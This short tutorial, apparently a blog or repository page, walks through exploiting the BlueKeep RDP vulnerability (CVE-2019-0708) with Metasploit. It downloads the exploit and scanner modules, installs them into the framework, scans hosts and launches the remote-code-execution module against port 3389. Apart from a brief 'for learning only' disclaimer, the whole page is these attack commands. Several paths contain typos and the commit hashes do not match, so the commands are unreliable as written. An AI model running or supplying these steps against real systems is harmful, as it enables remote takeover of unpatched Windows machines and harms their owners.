Xx_introduction

  • Please protection,respect,love,"China's Internet Security Act"!
  • For learning reference only!
  • Please indicate the source!

Ax_Preparation

  1. wget https://github.com/rapid7/metasploit-framework/edb7e0221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/explot/rdp.rb
  2. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scaner.rb
  3. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
  4. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  5. cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
  6. cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
  7. cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
  8. cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auiliary/scanner/rdp/

Bx_Scan

  • MSF update
    1
    apt-get update 2 apt-get install metasploit-framework

     

  • 1 su root
    2 msfconsole
    3 reload_all
    4 search 0708
    5 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
    6 set rhosts xxx
    7 run

Cx_Exploit

1 use windows/rdp/cve_2019_0708_bluekeep_rce 2 set rhost xxx 3 set target xxx 4 set rport 3389 5 exploit

  • once again